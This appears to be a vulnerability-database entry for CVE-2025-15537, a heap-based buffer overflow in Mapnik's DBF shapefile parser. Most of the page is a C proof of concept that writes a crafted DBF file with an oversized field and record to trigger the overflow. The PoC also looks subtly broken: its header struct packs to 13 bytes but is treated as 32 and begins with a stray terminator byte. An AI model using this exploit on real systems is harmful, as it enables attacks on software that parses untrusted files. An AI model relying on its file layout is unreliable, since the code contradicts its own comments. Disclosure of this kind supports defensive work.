Security Vulnerability Report
CVE-2025-15537 CVSS 5.3 MEDIUM

CVE-2025-15537

Published: 2026-01-18 10:15:52
Last Modified: 2026-04-29 01:00:02

Description

A security vulnerability has been detected in Mapnik up to 4.2.0. This issue affects the function mapnik::dbf_file::string_value of the file plugins/input/shape/dbfile.cpp. Such manipulation leads to heap-based buffer overflow. The attack must be carried out locally. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:mapnik:mapnik:*:*:*:*:*:*:*:* - VULNERABLE
Mapnik <= 4.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
/*
 * CVE-2025-15537 PoC - Mapnik heap-based buffer overflow in dbf_file::string_value
 * Target: Mapnik <= 4.2.0
 * File: plugins/input/shape/dbfile.cpp
 *
 * This PoC generates a malicious DBF file with oversized string field
 * that triggers heap buffer overflow when parsed by Mapnik.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#pragma pack(push, 1)
typedef struct {
    char terminator;        // 0x0D
    char version;           // 0x03 (dBASE III)
    uint8_t year;           // Year - 1900
    uint8_t month;
    uint8_t day;
    uint32_t record_count;
    uint16_t header_size;
    uint16_t record_size;
} dbf_header_t;

typedef struct {
    char name[11];          // Field name
    char type;              // 'C' for character
    uint32_t reserved1;
    uint8_t length;
    uint8_t decimal_count;
    uint16_t reserved2;
    uint8_t work_area_id;
    uint16_t reserved3;
    char set_fields_flag;
    char reserved4[8];
} dbf_field_descriptor_t;

typedef struct {
    char deletion_flag;
    char data[1];
} dbf_record_t;
#pragma pack(pop)

void create_malicious_dbf(const char* filename) {
    FILE* fp = fopen(filename, "wb");
    if (!fp) {
        perror("Failed to open file");
        return;
    }

    // Create header with oversized field
    dbf_header_t header;
    memset(&header, 0, sizeof(header));
    header.terminator = 0x0D;
    header.version = 0x03;
    header.year = 126;      // 2026 - 1900
    header.month = 1;
    header.day = 18;
    header.record_count = 1;
    header.header_size = 32 + 32 + 1;  // header + 1 field + EOF marker
    header.record_size = 1000;         // Oversized record size
    fwrite(&header, sizeof(header), 1, fp);

    // Create field descriptor with oversized length
    dbf_field_descriptor_t field;
    memset(&field, 0, sizeof(field));
    strncpy(field.name, "OVERFLOW", 11);
    field.type = 'C';
    field.length = 255;     // Oversized field length
    field.decimal_count = 0;
    fwrite(&field, sizeof(field), 1, fp);

    // EOF marker
    char eof = 0x1A;
    fwrite(&eof, 1, 1, fp);

    // Create record with overflow data
    char record[1000];
    memset(record, 0, sizeof(record));
    record[0] = ' ';        // Deletion flag (not deleted)
    // Fill with 'A' characters to trigger overflow
    memset(record + 1, 'A', 998);
    fwrite(record, sizeof(record), 1, fp);

    fclose(fp);
    printf("Malicious DBF file created: %s\n", filename);
    printf("Field length: 255, Record size: 1000\n");
}

int main(int argc, char* argv[]) {
    const char* filename = (argc > 1) ? argv[1] : "malicious.dbf";
    create_malicious_dbf(filename);
    printf("PoC for CVE-2025-15537\n");
    return 0;
}
```

References
